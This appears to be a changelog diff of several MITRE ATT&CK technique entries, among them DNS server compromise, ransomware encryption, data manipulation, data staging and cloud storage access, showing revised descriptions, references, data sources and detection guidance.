| Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 15:56:05.112000+00:00 | 2022-04-19 21:22:13.578000+00:00 |
| description | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) | Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations. By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing) |
| external_references[1]['source_name'] | Talos DNSpionage Nov 2018 | FireEye DNS Hijack 2019 |
| external_references[1]['description'] | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. |
| external_references[1]['url'] | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html |
| external_references[2]['source_name'] | FireEye DNS Hijack 2019 | Crowdstrike DNS Hijack 2019 |
| external_references[2]['description'] | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. | Matt Dahl. (2019, January 25). Widespread DNS Hijacking Activity Targets Multiple Sectors. Retrieved February 14, 2022. |
| external_references[2]['url'] | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html | https://www.crowdstrike.com/blog/widespread-dns-hijacking-activity-targets-multiple-sectors/ |
| external_references[3]['source_name'] | CiscoAngler | Talos DNSpionage Nov 2018 |
| external_references[3]['description'] | Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017. | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. |
| external_references[3]['url'] | https://blogs.cisco.com/security/talos/angler-domain-shadowing | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html |
| external_references[4]['source_name'] | Proofpoint Domain Shadowing | CiscoAngler |
| external_references[4]['description'] | Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020. | Nick Biasini. (2015, March 3). Threat Spotlight: Angler Lurking in the Domain Shadows. Retrieved March 6, 2017. |
| external_references[4]['url'] | https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows | https://blogs.cisco.com/security/talos/angler-domain-shadowing |
| x_mitre_data_sources[0] | Domain Name: Active DNS | Domain Name: Passive DNS |
| x_mitre_data_sources[1] | Domain Name: Passive DNS | Domain Name: Active DNS |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Proofpoint Domain Shadowing', 'description': 'Proofpoint Staff. (2015, December 15). The shadow knows: Malvertising campaigns use domain shadowing to pull in Angler EK. Retrieved October 16, 2020.', 'url': 'https://www.proofpoint.com/us/threat-insight/post/The-Shadow-Knows'} |
| Old Description | New Description |
|---|---|
| Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) |
New Detections:
Dropped Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:07:27.119000+00:00 | 2022-06-16 13:07:10.318000+00:00 |
| description | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted. In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) | Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018) In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017) To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020) In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1) |
| external_references[1]['source_name'] | US-CERT Ransomware 2016 | CarbonBlack Conti July 2020 |
| external_references[1]['description'] | US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019. | Baskin, B. (2020, July 8). TAU Threat Discovery: Conti Ransomware. Retrieved February 17, 2021. |
| external_references[1]['url'] | https://www.us-cert.gov/ncas/alerts/TA16-091A | https://www.carbonblack.com/blog/tau-threat-discovery-conti-ransomware/ |
| external_references[3]['source_name'] | US-CERT NotPetya 2017 | Rhino S3 Ransomware Part 1 |
| external_references[3]['description'] | US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019. | Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021. |
| external_references[3]['url'] | https://www.us-cert.gov/ncas/alerts/TA17-181A | https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ |
| external_references[4]['source_name'] | US-CERT SamSam 2018 | NHS Digital Egregor Nov 2020 |
| external_references[4]['description'] | US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019. | NHS Digital. (2020, November 26). Egregor Ransomware The RaaS successor to Maze. Retrieved December 29, 2020. |
| external_references[4]['url'] | https://www.us-cert.gov/ncas/alerts/AA18-337A | https://digital.nhs.uk/cyber-alerts/2020/cc-3681#summary |
| external_references[5]['source_name'] | Rhino S3 Ransomware Part 1 | US-CERT Ransomware 2016 |
| external_references[5]['description'] | Gietzen, S. (n.d.). S3 Ransomware Part 1: Attack Vector. Retrieved April 14, 2021. | US-CERT. (2016, March 31). Alert (TA16-091A): Ransomware and Recent Variants. Retrieved March 15, 2019. |
| external_references[5]['url'] | https://rhinosecuritylabs.com/aws/s3-ransomware-part-1-attack-vector/ | https://www.us-cert.gov/ncas/alerts/TA16-091A |
| x_mitre_data_sources[0] | Cloud Storage: Cloud Storage Metadata | File: File Creation |
| x_mitre_data_sources[1] | Cloud Storage: Cloud Storage Modification | File: File Modification |
| x_mitre_data_sources[2] | Process: Process Creation | Network Share: Network Share Access |
| x_mitre_data_sources[4] | File: File Modification | Cloud Storage: Cloud Storage Modification |
| x_mitre_data_sources[5] | File: File Creation | Process: Process Creation |
| x_mitre_version | 1.2 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'US-CERT NotPetya 2017', 'description': 'US-CERT. (2017, July 1). Alert (TA17-181A): Petya Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/TA17-181A'} | |
| external_references | {'source_name': 'US-CERT SamSam 2018', 'description': 'US-CERT. (2018, December 3). Alert (AA18-337A): SamSam Ransomware. Retrieved March 15, 2019.', 'url': 'https://www.us-cert.gov/ncas/alerts/AA18-337A'} | |
| x_mitre_contributors | Mayuresh Dani, Qualys | |
| x_mitre_contributors | Harshal Tupsamudre, Qualys | |
| x_mitre_contributors | Travis Smith, Qualys | |
| x_mitre_contributors | ExtraHop |
| Old Description | New Description |
|---|---|
| Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User', 'Administrator', 'root', 'SYSTEM'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-24 14:04:16.371000+00:00 | 2022-04-19 23:03:02.016000+00:00 |
| description | Adversaries may insert, delete, or manipulate data in order to manipulate external outcomes or hide activity. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. | Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact. |
| x_mitre_data_sources[0] | File: File Metadata | Network Traffic: Network Traffic Content |
| x_mitre_data_sources[1] | Process: OS API Execution | File: File Deletion |
| x_mitre_data_sources[2] | File: File Creation | Process: OS API Execution |
| x_mitre_data_sources[3] | File: File Deletion | File: File Modification |
| x_mitre_data_sources[4] | File: File Modification | Network Traffic: Network Traffic Flow |
| x_mitre_data_sources[5] | Network Traffic: Network Traffic Content | File: File Creation |
| x_mitre_data_sources[6] | Network Traffic: Network Traffic Flow | File: File Metadata |
| x_mitre_version | 1.0 | 1.1 |
| Description |
|---|
| Adversaries may stage collected data in a central location or directory prior to Exfiltration. Data may be kept in separate files or combined into one file through techniques such as [Archive Collected Data](https://attack.mitre.org/techniques/T1560). Interactive command shells may be used, and common functionality within [cmd](https://attack.mitre.org/software/S0106) and bash may be used to copy data into a staging location.(Citation: PWC Cloud Hopper April 2017) In cloud environments, adversaries may stage data within a particular instance or virtual machine before exfiltration. An adversary may [Create Cloud Instance](https://attack.mitre.org/techniques/T1578/002) and stage data in that instance.(Citation: Mandiant M-Trends 2020) Adversaries may choose to stage data from a victim network in a centralized location prior to Exfiltration to minimize the number of connections made to their C2 server and better evade detection. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:00.855000+00:00 | 2022-07-20 20:07:40.167000+00:00 |
| external_references[1]['source_name'] | PWC Cloud Hopper April 2017 | Mandiant M-Trends 2020 |
| external_references[1]['description'] | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. |
| external_references[1]['url'] | https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf | https://content.fireeye.com/m-trends/rpt-m-trends-2020 |
| external_references[2]['source_name'] | Mandiant M-Trends 2020 | PWC Cloud Hopper April 2017 |
| external_references[2]['description'] | Mandiant. (2020, February). M-Trends 2020. Retrieved April 24, 2020. | PwC and BAE Systems. (2017, April). Operation Cloud Hopper. Retrieved April 5, 2017. |
| external_references[2]['url'] | https://content.fireeye.com/m-trends/rpt-m-trends-2020 | https://web.archive.org/web/20220224041316/https:/www.pwc.co.uk/cyber-security/pdf/cloud-hopper-report-final-v4.pdf |
| x_mitre_data_sources[0] | File: File Access | File: File Creation |
| x_mitre_data_sources[1] | File: File Creation | Windows Registry: Windows Registry Key Modification |
| x_mitre_detection | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). | Processes that appear to be reading files from disparate locations and writing them to the same directory or file may be an indication of data being staged, especially if they are suspected of performing encryption or compression on the files, such as 7zip, RAR, ZIP, or zlib. Monitor publicly writeable directories, central locations, and commonly used staging directories (recycle bin, temp folders, etc.) to regularly check for compressed or encrypted data that may be indicative of staging. Monitor processes and command-line arguments for actions that could be taken to collect and combine files. Remote access tools with built-in features may interact directly with the Windows API to gather and copy to a location. Data may also be acquired and staged through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). Consider monitoring accesses and modifications to storage repositories (such as the Windows Registry), especially from suspicious processes that could be related to malicious data collection. |
| x_mitre_version | 1.3 | 1.4 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | File: File Access |
| Old Description | New Description |
|---|---|
| Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. | Adversaries may access data from improperly secured cloud storage. Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011) Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-03-08 10:33:01.374000+00:00 | 2022-10-18 19:10:42.621000+00:00 |
| name | Data from Cloud Storage Object | Data from Cloud Storage |
| description | Adversaries may access data objects from improperly secured cloud storage. Many cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) Misconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls. | Adversaries may access data from improperly secured cloud storage. Many cloud service providers offer solutions for online data object storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. In other cases, SaaS application providers such as Slack, Confluence, and Salesforce also provide cloud storage solutions as a peripheral use case of their platform. These cloud objects can be extracted directly from their associated application.(Citation: EA Hacked via Slack - June 2021)(Citation: SecureWorld - How Secure Is Your Slack Channel - Dec 2021)(Citation: HackerNews - 3 SaaS App Cyber Attacks - April 2022)(Citation: Dark Clouds_Usenix_Mulazzani_08_2011) Adversaries may collect sensitive data from these cloud storage solutions. Providers typically offer security guides to help end users configure systems, though misconfigurations are a common problem.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019) There have been numerous incidents where cloud storage has been improperly secured, typically by unintentionally allowing public access to unauthenticated users, overly-broad access by all users, or even access for any anonymous person outside the control of the Identity Access Management system without even needing basic user permissions. This open access may expose various types of sensitive data, such as credit cards, personally identifiable information, or medical records.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017)(Citation: Rclone-mega-extortion_05_2021) Adversaries may also obtain then abuse leaked credentials from source repositories, logs, or other means as a way to gain access to cloud storage objects. |
| external_references[1]['source_name'] | Amazon S3 Security, 2019 | SecureWorld - How Secure Is Your Slack Channel - Dec 2021 |
| external_references[1]['description'] | Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019. | Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022. |
| external_references[1]['url'] | https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ | https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#:~:text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim,credentials%20over%20a%20Slack%20channel. |
| external_references[2]['source_name'] | Microsoft Azure Storage Security, 2019 | Amazon S3 Security, 2019 |
| external_references[2]['description'] | Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019. | Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019. |
| external_references[2]['url'] | https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide | https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/ |
| external_references[3]['source_name'] | Google Cloud Storage Best Practices, 2019 | Microsoft Azure Storage Security, 2019 |
| external_references[3]['description'] | Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019. | Amlekar, M., Brooks, C., Claman, L., et. al.. (2019, March 20). Azure Storage security guide. Retrieved October 4, 2019. |
| external_references[3]['url'] | https://cloud.google.com/storage/docs/best-practices | https://docs.microsoft.com/en-us/azure/storage/common/storage-security-guide |
| external_references[4]['source_name'] | Trend Micro S3 Exposed PII, 2017 | EA Hacked via Slack - June 2021 |
| external_references[4]['description'] | Trend Micro. (2017, November 6). A Misconfigured Amazon S3 Exposed Almost 50 Thousand PII in Australia. Retrieved October 4, 2019. | Anthony Spadafora. (2021, June 11). EA hack reportedly used stolen cookies and Slack to target gaming giant. Retrieved May 31, 2022. |
| external_references[4]['url'] | https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/a-misconfigured-amazon-s3-exposed-almost-50-thousand-pii-in-australia | https://www.techradar.com/news/ea-hack-reportedly-used-stolen-cookies-and-slack-to-hack-gaming-giant |
| external_references[6]['source_name'] | HIPAA Journal S3 Breach, 2017 | Google Cloud Storage Best Practices, 2019 |
| external_references[6]['description'] | HIPAA Journal. (2017, October 11). 47GB of Medical Records and Test Results Found in Unsecured Amazon S3 Bucket. Retrieved October 4, 2019. | Google. (2019, September 16). Best practices for Cloud Storage. Retrieved October 4, 2019. |
| external_references[6]['url'] | https://www.hipaajournal.com/47gb-medical-records-unsecured-amazon-s3-bucket/ | https://cloud.google.com/storage/docs/best-practices |
| x_mitre_version | 1.1 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'HackerNews - 3 SaaS App Cyber Attacks - April 2022', 'description': 'Hananel Livneh. (2022, April 7). Into the Breach: Breaking Down 3 SaaS App Cyber Attacks in 2022. Retrieved May 31, 2022.', 'url': 'https://thehackernews.com/2022/04/into-breach-breaking-down-3-saas-app.html'} | |
